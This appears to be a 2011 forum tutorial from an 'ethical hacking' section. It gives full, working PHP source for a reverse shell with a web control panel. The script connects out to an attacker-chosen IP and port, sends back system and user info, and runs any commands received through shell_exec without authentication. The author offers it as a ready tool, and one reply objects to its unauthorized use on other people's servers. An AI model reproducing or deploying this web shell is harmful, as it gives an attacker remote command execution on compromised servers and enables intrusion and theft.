Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Reverse Shell in PHP (http://www.go4expert.com/articles/reverse-shell-php-t26892/)

lionaneesh 10Oct2011 02:14

Reverse Shell in PHP
 
Back Connect Shell also known as Reverse Shell is a Piece of Code which is used to Host a Shell on the Server or the Victim, But instead of sitting there and listening for connections (As in the Case of Bind Shell) it rather Connects Back to the Attacker Machine.

I already explained the Difference between a Bind Shell and a Reverse Shell Here.

In this tutorial we’ll be making a Back Connect Shell in PHP

Code



back-connect.php
Code: php

<?php

/*********************

@@author : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email : lionaneesh@gmail.com

********************/



ini_set('max_execution_time',0);

?>

<html>
<head>
    <title>Back Connect Shell -- PHP</title>
</head>

<body>

<h1>Welcome to Back Connect Control Panel </h1>

<p> Fill in the form Below to Start the Back Connect Service </p>

<?php
if( isset($_GET['port']) &&
    isset($_GET['ip']) &&
    $_GET['port'] != "" &&
    $_GET['ip'] != ""
    )
    {
        echo "<p>The Program is now trying to connect!</p>";
        $ip = $_GET['ip'];
        $port=$_GET['port'];
        $sockfd=fsockopen($ip , $port , $errno, $errstr );
        if($errno != 0)
        {
            echo "<font color='red'><b>$errno</b> : $errstr</font>";
        }
        else if (!$sockfd)
        {
               $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
        }
        else
        {
            fputs ($sockfd ,
            "\n=================================================================\n
            Back Connect in PHP\n
            Coded by lionaneesh\n
            @@author : lionaneesh
            @@facebook : facebook.com/lionaneesh
            @@Email : lionaneesh@gmail.com
            \n================================================================="
);
         $pwd = shell_exec("pwd");
         $sysinfo = shell_exec("uname -a");
         $id = shell_exec("id");
         $dateAndTime = shell_exec("time /t & date /T");
         $len = 1337;
         fputs($sockfd ,$sysinfo . "\n" );
         fputs($sockfd ,$pwd . "\n" );
         fputs($sockfd ,$id ."\n\n" );
         fputs($sockfd ,$dateAndTime."\n\n" );
         while(!feof($sockfd))
         { 
            $cmdPrompt ="(Shell)[$]> ";
            fputs ($sockfd , $cmdPrompt );
            $command= fgets($sockfd, $len);
            fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
         }
         fclose($sockfd);
        }
    }
    else
    {
    ?>
    <table align="center" >
         <form method="GET">
         <td>
            <table style="border-spacing: 6px;">
                <tr>
                    <td>Port</td>
                    <td>
                        <input style="width: 200px;" name="port" value="31337" />
                    </td>
                </tr>
                <tr>
                    <td>IP </td>
                    <td><input style="width: 100px;" name="ip" size='5' value="127.0.0.1"/>
                </tr>
                <tr>
                <td>
                <input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/>
                </td>
                </tr>   
                   
            </table>
         </td>
         </form>
    </tr>
    </table>
    <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
    }
?>


Its as easy as a couple of clicks to make it work and to use!

Here is a Screen Shot of its Working :-

http://imgs.g4estatic.com/reverse-sh...trol-panel.jpg

Enj0y! And Don't forget to Comment!

lionaneesh 10Oct2011 17:59

Re: Reverse Shell in PHP
 
Thanks for Accepting!

Alex.Gabriel 25Oct2011 20:43

Re: Reverse Shell in PHP
 
Hi, i don't agre with the unauthorized usage of php in peoples servers even when your posted code is old and can be found with google in few seconds but you should protect the file with a password to avoid those bots to enter as ip some viagra site. else you can prevent google to view this page ...this only if you want to restrict usage for those who know the url to file.


All times are GMT +5.5. The time now is 16:20.